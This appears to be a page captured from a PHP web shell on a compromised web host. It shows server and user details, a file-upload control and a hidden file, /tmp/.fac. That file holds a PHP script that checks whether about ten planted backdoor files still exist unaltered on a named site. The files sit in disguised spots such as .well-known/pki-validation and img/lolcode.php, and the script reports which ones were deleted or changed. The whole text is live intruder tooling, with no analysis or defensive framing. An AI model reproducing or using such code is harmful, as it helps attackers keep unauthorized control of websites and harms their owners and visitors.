HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: //tmp/.fac
<?php   $r = '/home/vitanhod/sawpalmeetto.vitavit.com.pk'; $x = ["/orderemail_bk.php"=>"bd@@1449646@@50",
"/includes/config.php"=>"bd@@1449630@@80",
"/class.dynamic.php"=>"bd@@1330038@@820",
"/.well-known/install.func.php"=>"bd@@1449525@@46",
"/includes/view.blocks.php"=>"bd@@1449600@@63",
"/.well-known/pki-validation/update_hw.php"=>"bd@@1449579@@38",
"/img/lolcode.php"=>"bd@@1445151@@1013",
"/.well-known/pki-validation/update.hw.php"=>"bd@@1329994@@958",
"/.well-known/install.func.php"=>"bd@@1330018@@1006",
"/includes/view.blocks.php"=>"bd@@1310573@@1021"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');